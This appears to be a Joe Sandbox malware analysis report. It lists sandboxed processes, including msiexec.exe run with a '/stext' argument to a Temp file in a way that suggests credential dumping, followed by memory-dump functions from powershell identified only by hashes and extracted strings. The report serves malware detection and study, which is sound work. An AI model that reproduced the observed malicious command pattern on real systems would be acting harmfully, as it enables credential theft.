                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:17
                                                                                                      Start time:09:03:49
                                                                                                      Start date:17/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj"
                                                                                                      Imagebase:0x1f0000
                                                                                                      File size:59'904 bytes
                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:18
                                                                                                      Start time:09:03:49
                                                                                                      Start date:17/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj"
                                                                                                      Imagebase:0x1f0000
                                                                                                      File size:59'904 bytes
                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Disassembly

                                                                                                      Reset < >

                                                                                                        Executed Functions

                                                                                                        Function 00007FF848F3C022 Relevance: 3.0, Strings: 2, Instructions: 464COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2245659085.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 'UY$'UY
                                                                                                        • API String ID: 0-1762368797
                                                                                                        • Opcode ID: 9fab3cd7a63365b09344522c9245ae7c97ce5dd3bb1e2ac01bbf232b0993b44b
                                                                                                        • Instruction ID: 7af2bfca8203d06675e30d2401174a15c4a3bd6bead9dd2a606f9277f236e181
                                                                                                        • Opcode Fuzzy Hash: 9fab3cd7a63365b09344522c9245ae7c97ce5dd3bb1e2ac01bbf232b0993b44b
                                                                                                        • Instruction Fuzzy Hash: 13E1A23090CA8E8FEBA8EF28C8557E937D1FB54350F14426AE84DC7291DF7899548B86
                                                                                                        Function 00007FF848F3B2C0 Relevance: 2.9, Strings: 2, Instructions: 446COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2245659085.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 'UY$'UY
                                                                                                        • API String ID: 0-1762368797
                                                                                                        • Opcode ID: a3ac00eb796ba7b8477116738e5df2734ae25e49e22407042661f0251513208c
                                                                                                        • Instruction ID: 36a14a5d54e32a917efa60a86e66752eec9c086ddb5907b855b03c628c3c0d73
                                                                                                        • Opcode Fuzzy Hash: a3ac00eb796ba7b8477116738e5df2734ae25e49e22407042661f0251513208c
                                                                                                        • Instruction Fuzzy Hash: 53E16E3091CA4D8FEBA8EF28D8557E937E1FB58350F00426EE84DC7295DB34A9458B86
                                                                                                        Function 00007FF848F3BC36 Relevance: 2.8, Strings: 2, Instructions: 336COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2245659085.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 'UY$'UY
                                                                                                        • API String ID: 0-1762368797
                                                                                                        • Opcode ID: 92f9084bc1b45789d7a65e29f9eeca63dbcb87a304afe14234d7488520b82706
                                                                                                        • Instruction ID: 8d150ab4229c06298f69eba4282bd70d05f79c6f19fc70c01c2b45eb6944783c
                                                                                                        • Opcode Fuzzy Hash: 92f9084bc1b45789d7a65e29f9eeca63dbcb87a304afe14234d7488520b82706
                                                                                                        • Instruction Fuzzy Hash: 60B1C43051CA8D8FEB69EF28C8557E93BE1FF55350F04426EE84DC7292CB3499458B86
                                                                                                        Function 00007FF849009C28 Relevance: .5, Instructions: 477COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4324628ec4b031851e338f8503d1e97720ae0c07509de435976410c886d8971f
                                                                                                        • Instruction ID: 6fb560113288a8de714fa816bd41c85d60a08edd6ab98d53a030d176720d0f9a
                                                                                                        • Opcode Fuzzy Hash: 4324628ec4b031851e338f8503d1e97720ae0c07509de435976410c886d8971f
                                                                                                        • Instruction Fuzzy Hash: 87E1CF31E0EAC94FEBA6AB2868552747BE1EF56250F1800FBC05DCB1D3EA199C45C352
                                                                                                        Function 00007FF849004922 Relevance: .4, Instructions: 411COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4aa1e4381c922ae31e438b2e8ffa645d1e75131c3a7d34d508f6301858d8710a
                                                                                                        • Instruction ID: 4fc3ee858b1aacf5a85295d14c34b386c6a709b05c50df178286df9615842d56
                                                                                                        • Opcode Fuzzy Hash: 4aa1e4381c922ae31e438b2e8ffa645d1e75131c3a7d34d508f6301858d8710a
                                                                                                        • Instruction Fuzzy Hash: B7C10A31E0EACA4FEBA9AA2868556757BD1EF56360F0801FED04DC71D3FD18D805835A
                                                                                                        Function 00007FF84900A557 Relevance: .4, Instructions: 411COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 09a34830a8947995b90e5338d53d0bf7a6c38d67a43d86e7021efa799ab32484
                                                                                                        • Instruction ID: f4fa76ccdfa089e68a90d14e7951458d34d0ee12f59356978cf4e04259e25cc9
                                                                                                        • Opcode Fuzzy Hash: 09a34830a8947995b90e5338d53d0bf7a6c38d67a43d86e7021efa799ab32484
                                                                                                        • Instruction Fuzzy Hash: 8CC12632E0DAC94FEBA5EA2868596757BE1EF56750B0801FBC04DC71D3EA18EC45C391
                                                                                                        Function 00007FF84900589D Relevance: .4, Instructions: 361COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: aee8912c5b0feb65a88d1ba460c96e2baf4ed67f69d7e48ac8a08437f4bbc951
                                                                                                        • Instruction ID: 7f8e7449eee0a087bd86be33137a4a5591b8f1889102dbfad30549eac14d5d49
                                                                                                        • Opcode Fuzzy Hash: aee8912c5b0feb65a88d1ba460c96e2baf4ed67f69d7e48ac8a08437f4bbc951
                                                                                                        • Instruction Fuzzy Hash: D0B10231E0EACA4FEBA5AF2D68556B57BE1FF562A0B0801FAD00DC7193EE18DC058351
                                                                                                        Function 00007FF84900AE91 Relevance: .3, Instructions: 281COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d5ed837b61c5140ce5c11ce664b50ba03bec4e408650d7142f4bdf5e546265a8
                                                                                                        • Instruction ID: 0b5d21ef2348d912c6c80ef7980c7735b196b723fdee03267725e7ac40e93041
                                                                                                        • Opcode Fuzzy Hash: d5ed837b61c5140ce5c11ce664b50ba03bec4e408650d7142f4bdf5e546265a8
                                                                                                        • Instruction Fuzzy Hash: 9391D82190E7C94FEB66AB7868555B4BFE0EF57360B0901FBD048CB1E3EA189849C352
                                                                                                        Function 00007FF84900B496 Relevance: .2, Instructions: 226COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3cd6c5f27f3c4cc80bfb0c412ced1bd1284df053421bdd99d2d5811101f63988
                                                                                                        • Instruction ID: 6078d2b4363247c680b3fc8e1eba822ec745e7b71f98af83d0ff6b421c57d398
                                                                                                        • Opcode Fuzzy Hash: 3cd6c5f27f3c4cc80bfb0c412ced1bd1284df053421bdd99d2d5811101f63988
                                                                                                        • Instruction Fuzzy Hash: BB71E432E0DAC54FEB65EB2868552B8BBE1FF55761F1801FEC04DD7183EE28A8458742
                                                                                                        Function 00007FF849009A51 Relevance: .2, Instructions: 222COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 146c4e2299e34656a1f1509ca7d4cd63beedc987fa1e69842e7e91dd695342cc
                                                                                                        • Instruction ID: f18f0c16e01726f00011a2ce6c8bd91ba9ea3b87d6b394847b2f987cbcd4f018
                                                                                                        • Opcode Fuzzy Hash: 146c4e2299e34656a1f1509ca7d4cd63beedc987fa1e69842e7e91dd695342cc
                                                                                                        • Instruction Fuzzy Hash: 4B513A31A0DAC95FEB59AB2868156B57BE1FF86360F0801FFD15EC31A3ED199805C391
                                                                                                        Function 00007FF84900AC8A Relevance: .2, Instructions: 217COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8bbb6d3e5bcf9e9d33a2ba3dc6d8e6685441cba49bff277066688fe9927f1b83
                                                                                                        • Instruction ID: 51564ccf5810918f5ea63cb61d92c740dc36cdcc08e7f1f7478f862957d725ec
                                                                                                        • Opcode Fuzzy Hash: 8bbb6d3e5bcf9e9d33a2ba3dc6d8e6685441cba49bff277066688fe9927f1b83
                                                                                                        • Instruction Fuzzy Hash: DB61E831E0DAC54FEB65EB2868552B8BBE1FF55361F1801FFC04997193EE18A8458352
                                                                                                        Function 00007FF84900A01A Relevance: .2, Instructions: 171COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c1108891373d66f1ca8fb1794767007bbecd71c7c8dbecc357d28c21bf12603d
                                                                                                        • Instruction ID: 70ca7a93a5b29aa6934528936bb82ce4a898804a96236ef1c1b75438c72d0638
                                                                                                        • Opcode Fuzzy Hash: c1108891373d66f1ca8fb1794767007bbecd71c7c8dbecc357d28c21bf12603d
                                                                                                        • Instruction Fuzzy Hash: 7551E531D0DBC69FE765EB2868592A8BBE1FF55750F0801FEC04D97183EE28AC498752
                                                                                                        Function 00007FF84900A760 Relevance: .2, Instructions: 167COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 093caa1938d764224ff102ebe80af401b80e3548145b610907d09b87179c669a
                                                                                                        • Instruction ID: 018efd5fff65ed487a53ba7eadfb26a9fcafc75963673b840fb97e0d471e3667
                                                                                                        • Opcode Fuzzy Hash: 093caa1938d764224ff102ebe80af401b80e3548145b610907d09b87179c669a
                                                                                                        • Instruction Fuzzy Hash: 7D511732A0DBC94FDB62EF2868596A4BBF0EF56354B0801FBC048C71D3DA189C45C392
                                                                                                        Function 00007FF8490059C2 Relevance: .1, Instructions: 121COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5bc98d4256f3129c1e0edefab5706de10e08ef6b95653722eeb2619e03371857
                                                                                                        • Instruction ID: e5d939e9dbc939ba2b45f48c1c1861a6190df35ecb09f19e34269fc9b2248220
                                                                                                        • Opcode Fuzzy Hash: 5bc98d4256f3129c1e0edefab5706de10e08ef6b95653722eeb2619e03371857
                                                                                                        • Instruction Fuzzy Hash: 3A31E421D1EAD75FFBB5AA6928551B8AAD0FF072A0F5801FAD41DD31D3FE08E8044352
                                                                                                        Function 00007FF849004A84 Relevance: .1, Instructions: 97COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8caca8029a8f9a89f2fb75bd166cc677ddb04580fdcc84704a397b82a873b7ab
                                                                                                        • Instruction ID: da50bda7a2c8483615920db08f342905137ecd9ee4c8437be074dba64f4f5288
                                                                                                        • Opcode Fuzzy Hash: 8caca8029a8f9a89f2fb75bd166cc677ddb04580fdcc84704a397b82a873b7ab
                                                                                                        • Instruction Fuzzy Hash: B621D231E1EA8A4FF7B5AA282495275B6D2FF452A0B5801FAD01DC7193FD18EC058249
                                                                                                        Function 00007FF848F3B734 Relevance: .1, Instructions: 92COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2245659085.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2e284daecc27ebcbf2bdc32f522113d2cf7634ea2cd23d2e09f81d5e5370ecf0
                                                                                                        • Instruction ID: 85bb152699af674fb165e5bf374b699d75492cf5fa623c9e48061d92d8c4125d
                                                                                                        • Opcode Fuzzy Hash: 2e284daecc27ebcbf2bdc32f522113d2cf7634ea2cd23d2e09f81d5e5370ecf0
                                                                                                        • Instruction Fuzzy Hash: 9331DC3082D64E9EFBB8AF18CC2ABF93294FF45395F40053AD80D861D2DB386985CB15
                                                                                                        Function 00007FF849009A91 Relevance: .1, Instructions: 92COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f8a67ea66012b9edfa9623cf32b800438cca5f1f3d6268e690ccc406bd31368d
                                                                                                        • Instruction ID: 34f0f5a318e6015ef5abcfc9d74685b3a9e4b4a65ca5868bca239cd30725ef0d
                                                                                                        • Opcode Fuzzy Hash: f8a67ea66012b9edfa9623cf32b800438cca5f1f3d6268e690ccc406bd31368d
                                                                                                        • Instruction Fuzzy Hash: 2F210832B0DA584EFF58A91D78421F9B3D1EF85620B04047FC24BC3583EE15E81682C5
                                                                                                        Function 00007FF8490096DA Relevance: .1, Instructions: 89COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3b4b6ca21423dd0211dd3b1fb91f329e0f5c4d68555bc499cf77a4e5fbcf719e
                                                                                                        • Instruction ID: 184e83ad375a71827125048552522c951b58f8c935533d9c6198e34dab71f25a
                                                                                                        • Opcode Fuzzy Hash: 3b4b6ca21423dd0211dd3b1fb91f329e0f5c4d68555bc499cf77a4e5fbcf719e
                                                                                                        • Instruction Fuzzy Hash: AB110A33B0CA5C4EEB59AA2C74051F9B7D1EFC5631F4411BBC15EC3143EE15E85A8295
                                                                                                        Function 00007FF8490019EF Relevance: .1, Instructions: 80COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 56fa232c5fc94eabf385297b2d6993387c865be9442e38e09e335f7a451317cd
                                                                                                        • Instruction ID: ebc79037871a16ad5d42a5b4966141154d883d90fc84bbe20eb6d2be50a19790
                                                                                                        • Opcode Fuzzy Hash: 56fa232c5fc94eabf385297b2d6993387c865be9442e38e09e335f7a451317cd
                                                                                                        • Instruction Fuzzy Hash: D321F622E0EAC65FE7A6AF3C28155746ED1FF576A1B0904FBD048DB1D3EC1C98494362
                                                                                                        Function 00007FF848F33945 Relevance: .0, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2245659085.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                        • Instruction ID: 5581c1bbeeb35668f75aff93aa97cf07b4c35495046711a11288b2c77098a6b1
                                                                                                        • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                        • Instruction Fuzzy Hash: 4001677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695D736E881CB45
                                                                                                        Function 00007FF849009CE8 Relevance: .0, Instructions: 39COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2246375103.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4c8d9e4cc93a31caab5e722ceee6b444402c581d6a35f1090ca3cc2e4975d8cc
                                                                                                        • Instruction ID: da96316208ed7ccc70ec2d862b7ecb5a1a141cee1c20d3313a371b5184ef9891
                                                                                                        • Opcode Fuzzy Hash: 4c8d9e4cc93a31caab5e722ceee6b444402c581d6a35f1090ca3cc2e4975d8cc
                                                                                                        • Instruction Fuzzy Hash: 3EF0B431E0D9868FEBA5EA1C9895974B3E1EF2576070805FAC40DCB1D7D918EC808791

                                                                                                        Executed Functions

                                                                                                        Function 04B3F328 Relevance: .3, Instructions: 281COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2345391300.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4b30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0f16584d578ed2e09c4c31391a35ca8cd8545c2a385cc2dd2078bef468fd5d18
                                                                                                        • Instruction ID: 187647f0b2a5211cd67d1d86405370e4e0f13b9433ce30b09595a7fb8d716490
                                                                                                        • Opcode Fuzzy Hash: 0f16584d578ed2e09c4c31391a35ca8cd8545c2a385cc2dd2078bef468fd5d18
                                                                                                        • Instruction Fuzzy Hash: 84B14C70E00209DFDF10CFAAC9857ADBBF2EF88315F148569E815A7264EB74A845DF81
                                                                                                        Function 04B3FBF8 Relevance: .3, Instructions: 266COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2345391300.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4b30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c8145643481fa8bc57acc111406d44fbb9d3c715a0700f2f97bf2453da584042
                                                                                                        • Instruction ID: ade99b2bbfb539cfc14f2c4ab4686eacc3b09fdd9bf3f1891c7172834c37ad9d
                                                                                                        • Opcode Fuzzy Hash: c8145643481fa8bc57acc111406d44fbb9d3c715a0700f2f97bf2453da584042
                                                                                                        • Instruction Fuzzy Hash: 0EB16170E00209CFDF10CFAAD9857ADBBF2EF88715F148569E815E7258EB34A845DB81
                                                                                                        Function 04B396D9 Relevance: .1, Instructions: 118COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2345391300.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4b30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e95e280e4cc82db684ee942439dfc1ab8901968c96224f19714ee25917f2b335
                                                                                                        • Instruction ID: b3461d12b2c6f2c65fbefcd31f964ba42ccc122587db7228ecaad67261feadbb
                                                                                                        • Opcode Fuzzy Hash: e95e280e4cc82db684ee942439dfc1ab8901968c96224f19714ee25917f2b335
                                                                                                        • Instruction Fuzzy Hash: 1341A270B002009FDB14DF65D958AAD7BF6EF89755F0590A8E506EB7A0CF74AC41CB50
                                                                                                        Function 07938100 Relevance: 10.3, Strings: 8, Instructions: 339COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$x.k$-k
                                                                                                        • API String ID: 0-2719265452
                                                                                                        • Opcode ID: b5b2d6ac60bd2dce660c93134956ac4f0ccd6c29ee2894df6e683b4b189d78e4
                                                                                                        • Instruction ID: eb91c7e806f1d8d3cde29f8dc87c4b2bf3028e7a742e4e17e229f4ac281106a6
                                                                                                        • Opcode Fuzzy Hash: b5b2d6ac60bd2dce660c93134956ac4f0ccd6c29ee2894df6e683b4b189d78e4
                                                                                                        • Instruction Fuzzy Hash: 72D17EB4B002059FCB19DBA8C555FAEBBA2AF94308F11C469E5016F385CB79DC45CBA2
                                                                                                        Function 07935785 Relevance: 10.3, Strings: 8, Instructions: 312COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$x.k$-k
                                                                                                        • API String ID: 0-2719265452
                                                                                                        • Opcode ID: 5ae07bd92349e0e8efbda6a43f96115bd9a919a2ec8cbb971664b42d34f601ea
                                                                                                        • Instruction ID: 6be71b9114fd3645c9402e114cfd7abbec9b8a11bac7c5a0590550bdf81f4c6f
                                                                                                        • Opcode Fuzzy Hash: 5ae07bd92349e0e8efbda6a43f96115bd9a919a2ec8cbb971664b42d34f601ea
                                                                                                        • Instruction Fuzzy Hash: E9D140B4B002149FDB24DB68C951B9EBBB2EF94304F1184A9E509AF385CB75DD818F92
                                                                                                        Function 079331C0 Relevance: 9.1, Strings: 7, Instructions: 367COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq$4'eq$tPeq$tPeq$$eq$$eq$$eq
                                                                                                        • API String ID: 0-1248304030
                                                                                                        • Opcode ID: 1c604a782924c9e3035df59af682cde195dc3567e1cb0d5de195c8a5771d6205
                                                                                                        • Instruction ID: a426a2cf8e70246f9696392a608ffad7d51a37425209a937f69ec98fff9458ef
                                                                                                        • Opcode Fuzzy Hash: 1c604a782924c9e3035df59af682cde195dc3567e1cb0d5de195c8a5771d6205
                                                                                                        • Instruction Fuzzy Hash: 76D149B1649385DFCB228F69C845A66BFB5EF82214F19C0ABD444CF292CB35DC41C7A2
                                                                                                        Function 07935C0B Relevance: 6.6, Strings: 5, Instructions: 395COMMON
                                                                                                        Download Yara Rule
